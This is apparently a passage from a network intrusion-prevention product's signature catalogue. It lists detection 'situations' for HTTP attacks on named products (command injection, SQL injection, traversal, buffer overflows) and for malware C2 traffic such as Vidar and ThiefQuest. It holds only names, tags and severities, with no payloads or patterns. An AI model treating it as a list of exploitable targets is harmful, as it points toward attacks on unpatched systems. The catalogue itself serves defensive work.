Tags: Any Operating System, Any Hardware, Supervene RazDC, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1721-5242
Vulnerability: Supervene-RazDC-Reset-Password-Code-Injection
Description:
Back to top

HTTP_CS-Support-Incident-Tracker-Remote-Command-Execution

About this situation: An attempt to exploit a Support Incident Tracker Remote Command Execution vulnerability detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Support Incident Tracker, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: Support-Incident-Tracker-Remote-Command-Execution
Description:
Back to top

HTTP_CS-Suspected-APT-Traffic-Pattern

About this situation: An HTTP request resembling APT traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1007-5242
Last changed: sgpkg-ips-1007-5242
Vulnerability: Known-APT-Traffic
Description:
Back to top

HTTP_CS-Suspicious-File-Upload

About this situation: Upload of a suspicious file over http detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CS-Suspicious-HTTP-Authorization-Negotiate-Token

About this situation: Detects HTTP Authorization: Negotiate fields with suspicious tokens
Context: HTTP Client Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows NT 4.0, Any Hardware, MS2004, CVE2003, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows NT 4.0 not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-477-5211
Vulnerability: Asn-1-Integer-BOF-MS04-007
Description:
Back to top

HTTP_CS-Suspicious-Request

About this situation: Invalid HTTP request method was detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CS-Suspicious-Request-Activity

About this situation: Suspicious request activity has been detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-903-5242
Last changed: sgpkg-ips-903-5242
Description:
Back to top

HTTP_CS-Suspicious-Request-Long-URI-No-HTTP-Method

About this situation: A long URI without any HTTP request method was detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1698-5242
Last changed: sgpkg-ips-1698-5242
Description:
Back to top

HTTP_CS-Suspicious-Request-URI

About this situation: Request to suspicious file over http detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CS-Suspiciously-Many-Header-Lines-Detected

About this situation: Attempt to exploit a buffer overflow by sending lots of headers
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-355-4219
Description:
Back to top

HTTP_CS-Sybase-M-Business-Anywhere-agSoap.exe-BOF

About this situation: An attempt to exploit a vulnerability in Sybase M-Business Anywhere detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Sybase M-Business Anywhere, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1279-5242
Vulnerability: Sybase-M-Business-Anywhere-agSoap.exe-BOF
Description:
Back to top

HTTP_CS-Symantec-Endpoint-Protection-Manager-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Symantec Endpoint Protection detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Endpoint Protection, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-783-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: Symantec-Endpoint-Protection-Manager-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CS-Symantec-Endpoint-Protection-Manager-Xml-External-Entity

About this situation: An attempt to exploit a vulnerability in Symantec Endpoint Protection Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Endpoint Protection Manager, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-571-5211
Vulnerability: Symantec-Endpoint-Protection-Manager-Xml-External-Entity
Description:
Back to top

HTTP_CS-Symantec-Web-Gateway-Input-Validation-Vulnerability

About this situation: An input validation vulnerability in Symantec Web Gateway file-management scripts.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-661-5211
Vulnerability: Symantec-Web-Gateway-Input-Validation-Vulnerability
Description:
Back to top

HTTP_CS-Symantec-Workspace-Streaming-XML-RPC-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Symantec Workspace Streaming detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Workspace Streaming, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Vulnerability: Symantec-Workspace-Streaming-XML-RPC-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Synology-DiskStation-Manager-Command-Execution

About this situation: An attempt to exploit a Synology DiskStation Manager Command Execution vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Synology, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1588-5242
Vulnerability: Synology-DiskStation-Manager-Command-Execution
Description:
Back to top

HTTP_CS-SysAid-Help-Desk-Administrator-Portal-File-Upload

About this situation: An attempt to exploit a SysAid Help Desk Administrator Portal File Upload vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SysAid, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-682-5211
Last changed: sgpkg-ips-682-5211
Vulnerability: SysAid-Help-Desk-Administrator-Portal-File-Upload
Description:
Back to top

HTTP_CS-Tenda-AX3-Command-Injection-CVE-2023-27240

About this situation: An attempt to exploit a vulnerability in Tenda AX3 routers detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Tenda, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Tenda-AX3-Command-Injection-CVE-2023-27240
Description:
Back to top

HTTP_CS-ThiefQuest-C2-Traffic

About this situation: ThiefQuest C2 traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Mac OS, Any Hardware, Mac OS not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1263-5242
Vulnerability: ThiefQuest-C2-Traffic
Description:
Back to top

HTTP_CS-TikiWiki-Information-Disclosure

About this situation: An attempt to exploit a TikiWiki Information Disclosure vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TikiWiki, CVE2006, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-732-5211
Vulnerability: TikiWiki-Information-Disclosure
Description:
Back to top

HTTP_CS-TikiWiki-Jhot.php-Script-File-Upload-Security-Bypass

About this situation: Detects script code execution exploits against TikiWiki
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TikiWiki, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-80-1314
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-TikiWiki-Jhot.php-Script-File-Upload-Security-Bypass
Description:
Back to top

HTTP_CS-Tinba-Bot-Traffic

About this situation: Tinba Bot traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1618-5242
Vulnerability: Tinba-Bot
Description:
Back to top

HTTP_CS-Tinyfilemanager.php-Fullpath-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Tiny File Manager Tiny File Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Tiny File Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Vulnerability: Tinyfilemanager.php-Fullpath-Directory-Traversal
Description:
Back to top

HTTP_CS-TinyNuke-Malware-C2-Traffic

About this situation: TinyNuke malware C2 traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1136-5242
Last changed: sgpkg-ips-1185-5242
Vulnerability: TinyNuke-Malware-C2-Traffic
Description:
Back to top

HTTP_CS-TinyTurla-NG-Backdoor-Traffic

About this situation: TinyTurla NG backdoor traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1695-5242
Vulnerability: Turla-Backdoor
Description:
Back to top

HTTP_CS-Tivoli-Endpoint-Buffer-Overflow

About this situation: An attempt to exploit a Tivoli Endpoint Buffer Overflow vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Endpoint Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Tivoli-Endpoint-Buffer-Overflow
Description:
Back to top

HTTP_CS-TRACE-Request

About this situation: HTTP TRACE request method was detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-685-5211
Vulnerability: HTTP-TRACE-Method-HTTP-Header-Information-Disclosure
Description:
Back to top

HTTP_CS-TRACK-Request

About this situation: HTTP TRACK request method was detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-685-5211
Description:
Back to top

HTTP_CS-Translate-F-MS00-58-Sourcecode-Disclosure-Attempt

About this situation: Attempt to view script source
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IIS 5.0, MS2000, CVE2000, Windows not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1618-5242
Vulnerability: Translate-F-MS00-058
Description:
Back to top

HTTP_CS-Trend-Micro-Control-Manager-Producttree_Rightwindow-XML-External-Entity-Processing

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Trend-Micro-Control-Manager-Producttree-XML-External-Entity-Processing
Description:
Back to top

HTTP_CS-Trend-Micro-Control-Manager-Treeusercontrol_Process_Tree_Event-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-798-5211
Vulnerability: Trend-Micro-Control-Manager-Treeusercontrol-Information-Disclosure
Description:
Back to top

HTTP_CS-Trend-Micro-Iwsva-Managepatches-Filename-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Trend-Micro-Iwsva-Managepatches-Filename-Command-Injection
Description:
Back to top

HTTP_CS-Trend-Micro-Iwsva-WMI_Domain_Controllers-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-770-5211
Vulnerability: Trend-Micro-Iwsva-WMI_Domain_Controllers-Command-Injection
Description:
Back to top

HTTP_CS-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Mobile Security (Enterprise) detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Mobile Security, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1005-5242
Vulnerability: Trend-Micro-Mobile-Security-Enterprise-Client_Info-Slink_Id-SQL-Injection
Description:
Back to top

HTTP_CS-Trend-Micro-OfficeScan-Cgi-Module-Multipart-BOF

About this situation: Detects Buffer Overflow attacks exploiting Trend Micro Officescan Cgi BOF
Context: HTTP Client Stream
Severity: 7
Tags: Windows, x86, Trend Micro OfficeScan, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-181-2032
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Trend-Micro-OfficeScan-Multiple-Cgi-Modules-Form-Processing-BOF
Description:
Back to top

HTTP_CS-Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187

About this situation: An attempt to exploit a vulnerability in Trend Micro OfficeScan detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187
Description:
Back to top

HTTP_CS-Trend-Micro-Web-Security-Virtual-Appliance-RCE

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: Trend-Micro-Web-Security-Virtual-Appliance-RCE
Description:
Back to top

HTTP_CS-Trihedral-Vtscada-Web-Interface-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Trihedral VTS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trihedral VTScada, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Trihedral-Vtscada-Web-Interface-Integer-Overflow
Description:
Back to top

HTTP_CS-Trojan.Win32.FraudPack-Checkin

About this situation: Trojan.Win32.FraudPack contacts Control server
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-293-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Trojan-Win32-FraudPack
Description:
Back to top

HTTP_CS-TYPO3-Lux-Extension-SQL-Injection

About this situation: An attempt to exploit a vulnerability in TYPO3 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, TYPO3, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: TYPO3-Lux-Extension-SQL-Injection
Description:
Back to top

HTTP_CS-Ubiquiti-Networks-AirOS-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ubiquiti Netoworks AirOS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ubiquiti Networks AirOS, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Ubiquiti-Networks-AirOS-Directory-Traversal
Description:
Back to top

HTTP_CS-Umbraco-CMS-File-Upload-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Umbraco CMS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Umbraco CMS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1334-5242
Last changed: sgpkg-ips-1334-5242
Vulnerability: Umbraco-CMS-File-Upload-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CS-Unauthenticated-RCE-In-NetAlertX

About this situation: An attempt to exploit a vulnerability in NetAlertX detected
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, NetAlertX, CVE2024, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Unauthenticated-RCE-In-NetAlertX
Description:
Back to top

HTTP_CS-V-CMS-PHP-File-Upload-And-Execute-Vulnerability

About this situation: An attempt to exploit a vulnerability in V-CMS 1.0 PHP File Upload detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, V-CMS PHP, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-655-5211
Vulnerability: V-CMS-PHP-File-Upload-And-Execute-Vulnerability
Description:
Back to top

HTTP_CS-Vercel-Next.js-Improper-URL-Handling-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in the Next.js React framework detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Vercel Next.js, CVE2021, Unix not specific, Linux not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Vulnerability: Vercel-Next.js-Improper-URL-Handling-Denial-of-Service
Description:
Back to top

HTTP_CS-VHD-PTZ-Camera-Firmware-Authentication-Bypass-CVE-2024-8956

About this situation: An attempt to exploit a vulnerability in VHD PTZ camera firmware detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VHD PTZ, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: VHD-PTZ-Camera-Firmware-Authentication-Bypass-CVE-2024-8956
Description:
Back to top

HTTP_CS-VICIDIAL-Multiple-Authenticated-SQLi

About this situation: An attempt to exploit a vulnerability in VICIdial detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VICIDIAL, CVE2022, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1507-5242
Vulnerability: VICIDIAL-Multiple-Authenticated-SQLi
Description:
Back to top

HTTP_CS-Vidar-Malware-Infection-Traffic

About this situation: Vidar malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Vidar-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-ViRobot-Server-Addschup-Cookie-Buffer-Overflow

About this situation: ViRobot cookie buffer overflow detected
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Any Hardware, ViRobot, CVE2005, Unix not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-503-5211
Vulnerability: HTTP-ViRobot-Server-Addschup-Cookie-Buffer-Overflow
Description:
Back to top

HTTP_CS-Visual-Mining-Netcharts-Server-Admin-Console-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Visual Mining NetCharts Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Visual Mining NetCharts, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Visual-Mining-Netcharts-Server-Admin-Console-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Visual-Mining-Netcharts-Server-File-Upload-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Visual Mining NetCharts Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Visual Mining NetCharts, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Visual-Mining-Netcharts-Server-File-Upload-Directory-Traversal
Description:
Back to top

HTTP_CS-Vjw0rm-Malware-Infection-Traffic

About this situation: Vjw0rm malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1382-5242
Last changed: sgpkg-ips-1382-5242
Vulnerability: Vjw0rm-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-Vmax3-Vasa-Provider-Uploadconfigurator-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in EMC VMAX3 VASA Provider detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMAX3 VASA Provider, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Vulnerability: EMC-Vmax3-Vasa-Provider-Uploadconfigurator-Directory-Traversal
Description:
Back to top

HTTP_CS-VMware-Aria-Operations-For-Networks-Exportpdf-Code-Injection

About this situation: An attempt to exploit a vulnerability in VMWare Aria Operations for Networks detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Aria Operations for Networks, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1647-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: VMware-Aria-Operations-For-Networks-Exportpdf-Code-Injection
Description:
Back to top

HTTP_CS-VMware-Aria-Operations-For-Networks-Savefiletodisk-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in VMware Aria Operations for Networks detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Aria Operations for Networks, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1632-5242
Vulnerability: VMware-Aria-Operations-For-Networks-Savefiletodisk-Directory-Traversal
Description:
Back to top

HTTP_CS-VMware-Cloud-Director-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Mware Cloud Director detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VMware Cloud Foundation, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Vulnerability: VMware-Cloud-Director-Remote-Code-Execution
Description:
Back to top

